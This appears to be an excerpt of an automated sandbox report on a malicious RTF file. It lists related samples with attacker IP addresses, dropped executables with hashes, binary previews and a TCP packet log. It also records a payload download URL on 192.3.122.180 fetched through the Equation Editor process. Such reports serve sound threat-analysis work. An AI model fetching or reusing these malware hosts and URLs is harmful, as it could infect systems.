                                                              RFQ No. 109050.xlsxGet hashmaliciousBrowse
                                                              • 23.94.174.144
                                                              INV-088002904SINO.xlsxGet hashmaliciousBrowse
                                                              • 107.172.76.210
                                                              quotation-linde-tunisia-plc-december-2021.xlsxGet hashmaliciousBrowse
                                                              • 107.173.191.75
                                                              RFQ with Specification (Fitch Solutions).docxGet hashmaliciousBrowse
                                                              • 192.3.122.180
                                                              VALVE.exeGet hashmaliciousBrowse
                                                              • 23.94.54.224
                                                              Quotation - Linde Tunisia PLC..xlsxGet hashmaliciousBrowse
                                                              • 107.173.191.75
                                                              Quotation 2200.xlsxGet hashmaliciousBrowse
                                                              • 107.173.143.36
                                                              DAEFWjToGE.exeGet hashmaliciousBrowse
                                                              • 198.23.172.50
                                                              V2N1M2_P.VBSGet hashmaliciousBrowse
                                                              • 192.3.121.222
                                                              SHIPPING DOCUMENT.xlsxGet hashmaliciousBrowse
                                                              • 23.94.174.144
                                                              REMITTANCE ADVICE.xlsxGet hashmaliciousBrowse
                                                              • 23.94.174.144
                                                              SOA SIL TL382920.xlsxGet hashmaliciousBrowse
                                                              • 192.3.121.173

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              C:\Users\user\AppData\Roaming\misv.exeQEw7lxB2iE.rtfGet hashmaliciousBrowse
                                                                sKxsGhU1Wg.exeGet hashmaliciousBrowse
                                                                  C:\Users\user\AppData\Local\Temp\Acly3.exeQEw7lxB2iE.rtfGet hashmaliciousBrowse
                                                                    sKxsGhU1Wg.exeGet hashmaliciousBrowse
                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeQEw7lxB2iE.rtfGet hashmaliciousBrowse
                                                                        C:\Users\Public\vbc.exeQEw7lxB2iE.rtfGet hashmaliciousBrowse

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Category:downloaded
                                                                          Size (bytes):131595
                                                                          Entropy (8bit):7.073841941088541
                                                                          Encrypted:false
                                                                          SSDEEP:3072:gbG7N2kDTHUpou4ub+HbksLwq6cttYgSj+LaQitS42:gbE/HUjwkshtOlj+LaQitE
                                                                          MD5:99BDB5995C8DD619A3EC2B799D1CF868
                                                                          SHA1:7EB9E30BA8572F07A1E88972AD8F14954E84EB39
                                                                          SHA-256:C6F93EB69924750ADBE61115B2D6A200D534E783C6BD4CA0E2C0CD2969E9469E
                                                                          SHA-512:8A2817D4CD4D9584C0C723CA96550B65F530C6DE6193B977239CE3C90C8EB0E3942B7ECF2AC3F12C730AE053C3A88993D54BFED16FEE6B2CC5AA5083105C52D6
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 20%
                                                                          Joe Sandbox View:
                                                                          • Filename: QEw7lxB2iE.rtf, Detection: malicious, Browse
                                                                          Reputation:low
                                                                          IE Cache URL:http://192.3.122.180/1100/vbc.exe
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.......................................@..........................................................................................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F8012674-B7CB-458D-8650-A31E79A66D61}.tmp
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                          Category:dropped
                                                                          Size (bytes):5632
                                                                          Entropy (8bit):3.9382976026552097
                                                                          Encrypted:false
                                                                          SSDEEP:48:ruLgOdZw1wQ5l/8bc3ABCOktG0/RIoj+WRdpzH:2BZmwQ5l/n3ABJf0J5jRRP
                                                                          MD5:CDAED283D66EF69103EAB36E7A087231
                                                                          SHA1:DE3A1270341A60F1BCF6657155E470DAE1505473
                                                                          SHA-256:C7D64784E1C35D116D0C123DECC90931F1B077829C15DF31C5FA9B4A7221AE47
                                                                          SHA-512:9A3F49CD4CDE57113A5616B12F8C244FD772C5AC600FA3931E7488E7176FB3FB24D279F708B246D62DFF7F9E33B304CE15C0649A8277666FB903BD8CEA9A506D
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AAA38BD7-6E2E-4485-B33A-19C659167A7E}.tmp
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1024
                                                                          Entropy (8bit):0.05390218305374581
                                                                          Encrypted:false
                                                                          SSDEEP:3:ol3lYdn:4Wn
                                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                          Malicious:false
                                                                          Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F0D5BFD7-E4B2-42A8-9D9F-4F62C3EB8116}.tmp
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):3774
                                                                          Entropy (8bit):3.5540606276661406
                                                                          Encrypted:false
                                                                          SSDEEP:96:qUNznlUendEJjgCjk6/AT/xe6GpzSsP8XuSo:vNLlU3N4qAdelpI+
                                                                          MD5:1F3897864361C0D07786091F3C2CA1B9
                                                                          SHA1:45E2127F9AECB43545DEBEF1B7ADCF4E75603650
                                                                          SHA-256:BF5AD13992235C123456E15FAF52BD54F6DB416A277A5D9109F1174C74BF6F17
                                                                          SHA-512:39A8C13353340CF55881A028AB783F4482E056B71E20C7821F4986C6BF7262A28B3AEA05493B1063A2FF91F2DD7CDDD48CE69BE274EACC131724804CC0998380
                                                                          Malicious:false
                                                                          Preview: |.!.`.=._.-.^.;...<.?.*.?.^.?.!.^.!.%...%._...?.5.7.#.~.:.7.@.9.:.[.:.6.~.?.%.@...<...2._.=.!.!.!.4.,.9.?.?.].%.?.%.].[.+._.3.9.*.9.~.&.%.3.=.?.0.#.4.2.>.>.|.;.~.1.).@.;.5.4.@.?.)./.?.,.?.7.;.5.?.%.?.6.7.7.)...^.9._.?.|.9.3.4.~.|.,.&.2.8._.5.?.3./.2.+.4...%.%.0.?.`.^.(.3.].?.%.~.)...1.2.!./.#.*.~.%.?...].|...>.+.7.-._.-.@.@.2.?.*.<.&.).>.@.;.:.].>.$.?.[...?._.!.|.&.%.=.8.<.&.2.`.4.%.!._.*.~...~.8.'.%.+.%.1.>.?.%.]...'...*.7.$.'.4...|.'.,.9.~.'.=.7.!.!.4.7.../.?.?.;.9.:.,.:.#.?.%...<.[.8.'./.7...-.&.%.&.1.#...&.;.].6.+.%.].=.?.).*.0.-.4.|.-.^._.3._.5...?.%.$.-.+.|.^.9...7.#.@.~.&.3.!.!...%.|...;.2.>.2.....].=...6.8.).6.2.3.~.+.[.#.?...=.#.@.?.....@.#...;.2.?.:.`...!.....(.?.+.2.@.?.[.+.*.9.*.9.&.3.?.&.?...'._.;...<.5.!.(...=.1.1.2.~.3.1.>.1.!.+.%.~.1.&.,.3.!.?.].,.%.>.(.5.$.^.|.<.~.?.,.?.%.;.;.'.`.@.7.*.[.?.'.3._.~.;.'.+.=.2._.1.&.<.'.(.5.(.2.+.,...].'.2.!.0.+.-.1.+.?.8...?.|.0.!...*.3.?.<.!.?.;.:.?.*.&.-.$.'.?.3.].;.!.%.5.=./.$.;./.?.%.+.=.$.=.|.%.>.[.&.'...~.!.8.%.3.'.^...&.>.?.8.).$.
                                                                          C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                                          Process:C:\Users\Public\vbc.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):21304624
                                                                          Entropy (8bit):0.09518636040127255
                                                                          Encrypted:false
                                                                          SSDEEP:1536:j30RIkuZxe033g6Oixa+IC8KNXA/wMy2dWVu2h55nw6+717EQZ4yr3hShX:j30qHZxT3gsxaZmNXYy7zysx
                                                                          MD5:E32061DA9B34B82E0AB5D0E53CAF5A09
                                                                          SHA1:5AABAD649F6C4B826C30BDF8152E6F8D33CB8133
                                                                          SHA-256:7C9AEB4763912BE27C0B5CFE843642E4424902DD2EEFB1AD2DF6092EBF10A468
                                                                          SHA-512:EBF93E81A0AB530EA19131F490A2423E017384357731FBE5CAC4D60876C5B535E371BB9443D62AEA8F41D732079EAB2A6EDD4335EDEAAD086EED2410D5914F54
                                                                          Malicious:true
                                                                          Joe Sandbox View:
                                                                          • Filename: QEw7lxB2iE.rtf, Detection: malicious, Browse
                                                                          • Filename: sKxsGhU1Wg.exe, Detection: malicious, Browse
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,..SM.SM.SM..Q..RM..o.UM.ek.RM.RichSM.................PE..L....#L......................B.....$........ ....@...........................E......QE.....................................t...(....0....B.........P.E.....................................................0... ....................................text...$........................... ..`.data...p.... ....... ..............@....rsrc.....B..0....B..0..............@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\T81Ip9NCGi.LNK
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Dec 2 03:57:13 2021, mtime=Thu Dec 2 03:57:13 2021, atime=Thu Dec 2 03:57:16 2021, length=18403, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):1014
                                                                          Entropy (8bit):4.531820687735484
                                                                          Encrypted:false
                                                                          SSDEEP:12:8N2PFgXg/XAlCPCHaXeBhB/z+X+Wnba/sAm4Ticvbly41sAm4VDtZ3YilMMEpxRG:8N4/XTuzc15AseCAjDv3q7Qd7Qy
                                                                          MD5:8593369DA2490C4D690D72E160EC2CA3
                                                                          SHA1:4FC38185BEEEC9C367C20A048077C56D56A0B2D4
                                                                          SHA-256:34C5DFDBE2E81FB98D38382C1C530D3E95AF48709CC84EF9BE6E46BB0BE6723F
                                                                          SHA-512:D92CF3B334A39874B8CFECBCADE7DD6F626412E4411CD3E53C7566076B8D89EC8280CF60D2D8DC0ADCA68DCA9A945B87AA6FE42B1FA5B140883C48EEE8F2944D
                                                                          Malicious:false
                                                                          Preview: L..................F.... ...S...9...S...9....V..9....G...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S''..Desktop.d......QK.X.S''*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..G...S)' .T81IP9~1.RTF..J......S''.S''*.........................T.8.1.I.p.9.N.C.G.i...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\226546\Users.user\Desktop\T81Ip9NCGi.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.T.8.1.I.p.9.N.C.G.i...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......226546..........D_....3N...W...9..g............[D_....3N...W...9..g...
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):72
                                                                          Entropy (8bit):4.748011161929185
                                                                          Encrypted:false
                                                                          SSDEEP:3:bDuMJlpWsVtvomxW6Btvov:bCiWsVVjVy
                                                                          MD5:1D77163C0F35431030160BF3341C3B4B
                                                                          SHA1:BB1F38491850D9953B0CA1E2492D4D55B39F3E50
                                                                          SHA-256:D1DEC03FB357CAEBB191B639244E0762D6F8F177BAD7E314AE80B952BDE8C384
                                                                          SHA-512:2EB3AB0A9775433EB7285364B4F5534EE4EA50725611754D4A262C030763D164A13A1DA5E20B96F550894E006711E4C16F91B8A346A4142216EF045002D2D798
                                                                          Malicious:false
                                                                          Preview: [folders]..Templates.LNK=0..T81Ip9NCGi.LNK=0..[misc]..T81Ip9NCGi.LNK=0..
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):162
                                                                          Entropy (8bit):2.5038355507075254
                                                                          Encrypted:false
                                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                          Malicious:false
                                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\3RY9W7X3.txt
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                          File Type:ASCII text
                                                                          Category:downloaded
                                                                          Size (bytes):62
                                                                          Entropy (8bit):4.029999133836105
                                                                          Encrypted:false
                                                                          SSDEEP:3:vpqMLJUQ2lOCsRRGcTk/n:vEMWXlOCsRR6
                                                                          MD5:ADB392BC717EDD06CE9EC32DCECFE628
                                                                          SHA1:EED907EBCE20C46D1FCC3D55AA60C896FCA0543D
                                                                          SHA-256:60AB9E8D2AB8FE84107A6DEC8FBBFAED35786593B2D17E05D116CAFAE84FADC2
                                                                          SHA-512:F8C69C818D06E9F8E2AFCFD42126671DAF8AA578BA5F7510C2159EC401DB0DB010D26C778996BA64FA86BDEE47D3A9A0B655EAAA9DB2E76B08336CDC3EFFB3BA
                                                                          Malicious:false
                                                                          IE Cache URL:live.com/
                                                                          Preview: wla42..live.com/.1536.738723328.30927982.255686239.30926650.*.
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\W56Z07SP.txt
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):62
                                                                          Entropy (8bit):4.092532149055232
                                                                          Encrypted:false
                                                                          SSDEEP:3:vpqMLJUQ2udSLCsKfOW2I/n:vEMWXS8Csq2+
                                                                          MD5:4627BA4A1F33E5418EBE1537A38D5993
                                                                          SHA1:DA04BE94C45C85115B543C742C2037374E89C30D
                                                                          SHA-256:DB56B1FCD113AC79ECE19BAA1D68DDED7341C419B2498250218F3A5C6783BC70
                                                                          SHA-512:C0DEAB6D1863A717C852FDF72E31F59A1D6B60C7A9443FF6C74CBD59E13AC3898751343556784A8218FFF5CE9E72581F291A32E93BB5E1CD24BFE78ECF8CB65A
                                                                          Malicious:false
                                                                          Preview: wla42..live.com/.1536.788723328.30927982.300770641.30926650.*.
                                                                          C:\Users\user\AppData\Roaming\misv.exe
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Category:dropped
                                                                          Size (bytes):135018
                                                                          Entropy (8bit):7.060957913639306
                                                                          Encrypted:false
                                                                          SSDEEP:3072:gbG7N2kDTHUpou4ubvh1q2SRdteVQNOqeOEgyVlzba:gbE/HUjva2udnNOqbByVlPa
                                                                          MD5:1DA682EC8DCBC375B6E76660EF46D3FD
                                                                          SHA1:B7DA4D771226B5A4F045B0D8A263451612EE3303
                                                                          SHA-256:6D624544826CC99182030BB50757944FEE3734EA01E8C37A77A22214BFF4B9DF
                                                                          SHA-512:2077475610EAA19020D7AFA36896B3E995D66651F4D0E8B4EB8523D64EA8C4B5C48778081182C033FD3C330A253EF8FA34E935BAD4EF7947CD17EE09B126AA4F
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          Joe Sandbox View:
                                                                          • Filename: QEw7lxB2iE.rtf, Detection: malicious, Browse
                                                                          • Filename: sKxsGhU1Wg.exe, Detection: malicious, Browse
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.......................................@..........................................................................................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                          C:\Users\user\Desktop\~$1Ip9NCGi.rtf
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):162
                                                                          Entropy (8bit):2.5038355507075254
                                                                          Encrypted:false
                                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                          Malicious:false
                                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                          C:\Users\Public\vbc.exe
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Category:dropped
                                                                          Size (bytes):131595
                                                                          Entropy (8bit):7.073841941088541
                                                                          Encrypted:false
                                                                          SSDEEP:3072:gbG7N2kDTHUpou4ub+HbksLwq6cttYgSj+LaQitS42:gbE/HUjwkshtOlj+LaQitE
                                                                          MD5:99BDB5995C8DD619A3EC2B799D1CF868
                                                                          SHA1:7EB9E30BA8572F07A1E88972AD8F14954E84EB39
                                                                          SHA-256:C6F93EB69924750ADBE61115B2D6A200D534E783C6BD4CA0E2C0CD2969E9469E
                                                                          SHA-512:8A2817D4CD4D9584C0C723CA96550B65F530C6DE6193B977239CE3C90C8EB0E3942B7ECF2AC3F12C730AE053C3A88993D54BFED16FEE6B2CC5AA5083105C52D6
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 20%
                                                                          Joe Sandbox View:
                                                                          • Filename: QEw7lxB2iE.rtf, Detection: malicious, Browse
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.......................................@..........................................................................................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                          Static File Info

                                                                          General

                                                                          File type:Rich Text Format data, unknown version
                                                                          Entropy (8bit):3.8961893755654535
                                                                          TrID:
                                                                          • Rich Text Format (5005/1) 55.56%
                                                                          • Rich Text Format (4004/1) 44.44%
                                                                          File name:T81Ip9NCGi.rtf
                                                                          File size:18403
                                                                          MD5:79b064007e51e1cfb2f7c91c732242a9
                                                                          SHA1:c4748fd11683b4b02e5bbc13746005a023f66568
                                                                          SHA256:b5784dc5717d0733bcdd150fda07cc94bcc2e2529e0f03e3bb9ec9b623302496
                                                                          SHA512:ae4601607f1ab7cd49cf1bd3f99b814936cdaa1fbd0d4c48194e914c843ad35720a9aa3d0ea7a8c236247d0c166188c4fdc6b17be7da560827eb471ab01b100b
                                                                          SSDEEP:384:B8TOyxGioDT31T1cn2UXNaMoPjhaeFkfylzc:B8TjxmDT3CFNShpFUMc
                                                                          File Content Preview:{\rtf79583|!`=_-^;.<?*?^?!^!%.%_.?57#~:7@9:[:6~?%@.<.2_=!!!4,9??]%?%][+_39*9~&%3=?0#42>>|;~1)@;54@?)/?,?7;5?%?677).^9_?|934~|,&28_5?3/2+4.%%0?`^(3]?%~).12!/#*~%?.]|.>+7-_-@@2?*<&)>@;:]>$?[.?_!|&%=8<&2`4%!_*~.~8'%+%1>?%].'.*7$'4.|',9~'=7!!47./??;9:,:#?%.<[

                                                                          File Icon

                                                                          Icon Hash:e4eea2aaa4b4b4a4

                                                                          Static RTF Info

                                                                          Objects

                                                                          IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                          0000005F3hno
                                                                          1000005C3hno

                                                                          Network Behavior

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 1, 2021 20:57:57.919903040 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.034516096 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.034670115 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.035166025 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.153230906 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.153278112 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.153299093 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.153323889 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.153407097 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.159173965 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.267669916 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.267709970 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.267733097 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.267750978 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.267772913 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.267791986 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.267894030 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.271181107 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.273269892 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.273317099 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.273372889 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.273391008 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.382316113 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.382353067 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.382371902 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.382390022 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.382412910 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.382436037 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.382457972 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.382479906 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.382486105 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.382503033 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.382518053 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.382520914 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.382529020 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.384428024 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.387448072 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.387469053 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.387528896 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.387636900 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.387655020 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.387671947 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.387672901 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.387689114 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.387696028 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.387701035 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.387713909 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.499804020 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.499847889 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.499865055 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.499888897 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.499916077 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.499941111 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.499963999 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.499988079 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.499986887 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.500010967 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.500015020 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.500035048 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.500052929 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.500056982 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.500078917 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.500082016 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.500099897 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.500116110 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.500123024 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.500147104 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.500147104 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.500166893 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.500171900 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.500195980 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.500196934 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.500219107 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.500226021 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.500255108 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.503081083 CET4916580192.168.2.22192.3.122.180
                                                                          Dec 1, 2021 20:57:58.504206896 CET8049165192.3.122.180192.168.2.22
                                                                          Dec 1, 2021 20:57:58.504235029 CET8049165192.3.122.180192.168.2.22
